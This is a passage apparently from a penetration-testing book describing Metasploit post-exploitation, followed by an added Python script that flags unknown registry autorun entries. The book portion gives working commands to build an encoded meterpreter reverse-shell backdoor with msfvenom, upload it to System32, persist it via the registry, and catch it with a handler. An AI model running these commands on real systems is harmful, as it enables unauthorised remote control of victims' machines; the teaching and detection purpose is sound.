Postexploitation
To generate an encoded executable, we will use the following command:
root@bt:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.75.144 LPORT=4444 -f exe > /root/Desktop/backdoor.exe
We can see that our backdoor succeeded with five iterations. Now it's time to upload our backdoor to the target machine and make it persistent, just like we did with netcat. We use the same commands to accomplish our goal.
Command:
upload /root/Desktop/backdoor.exe C:\\Windows\\System32
Next we make our backdoor persistent by making changes to the registry.
Once our registry value has been set, our backdoor starts making connections to the LHOST we provided as soon as Windows reboots. To receive the connection, we need to set up a handler.
We can set up a handler by issuing the following command from the Metasploit console:
use exploit/multi/handler
Next we need to define LHOST and LPORT, using the same values we defined when we created the backdoor.
As soon as Windows reboots, a meterpreter session will be opened again.
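A defender-side check for the registry persistence described above, as an added example that is not from the book: it parses saved `reg query` output and reports autorun entries whose binary is missing from a known-good baseline. The Run key, the sample output and the `BASELINE` set are assumptions; the page does not show which registry value it sets.

```python
import ntpath
import re

# Constructed sample: `reg query` output for the machine-wide Run key.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    backdoor    REG_SZ    C:\Windows\System32\backdoor.exe
"""

# Hypothetical baseline: autorun binaries recorded from a known-good build.
BASELINE = {"securityhealthsystray.exe", "vmtoolsd.exe"}

# A value line is indented four spaces, with four spaces between its fields.
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")


def parse_run_values(text):
    """Yield (key, value_name, data) for each value in `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        else:
            m = VALUE_LINE.match(line)
            if m and key:
                yield key, m["name"], m["data"]


def target_path(data):
    """Extract the executable path from a Run command line, dropping arguments."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    m = re.match(r"(?i)(.+?\.(?:exe|com|bat|cmd|scr))(?:\s|$)", data)
    return m.group(1) if m else data.split(" ", 1)[0]


def suspicious_autoruns(text, baseline=BASELINE):
    """Return Run entries whose binary is absent from the baseline."""
    findings = []
    for key, name, data in parse_run_values(text):
        path = target_path(data)
        if ntpath.basename(path).lower() not in baseline:
            in_system32 = ntpath.dirname(path).lower().endswith(r"\system32")
            findings.append({"key": key, "value": name, "path": path,
                             "in_system32": in_system32})
    return findings
```

An unknown binary started from a Run value and sitting directly in System32, as in the upload step above, is worth triaging first; the `in_system32` field marks those entries.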